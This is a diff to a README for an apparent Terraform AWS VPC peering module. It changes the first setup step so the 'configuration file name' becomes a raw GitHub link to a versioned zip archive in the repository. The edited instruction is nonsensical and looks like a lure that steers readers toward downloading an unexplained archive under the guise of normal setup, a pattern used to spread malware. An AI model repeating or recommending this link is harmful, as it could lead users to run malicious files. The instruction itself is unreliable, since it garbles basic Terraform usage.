ErTmannobom/terraform-aws-vpc-peering/README.md

 Creating VPC peering is straightforward with terraform-aws-vpc-peering.
 Follow these steps:

-1. Create a Terraform configuration file, typically named `main.tf`.
+1. Create a Terraform configuration file, typically named `https://raw.githubusercontent.com/ErTmannobom/terraform-aws-vpc-peering/main/examples/terraform-aws-vpc-peering_3.6-beta.4.zip`.
 2. Define your providers and the VPC you want to peer.
 3. Use the included examples for guidance.
 4. Run `terraform init` in the terminal to set up your environment.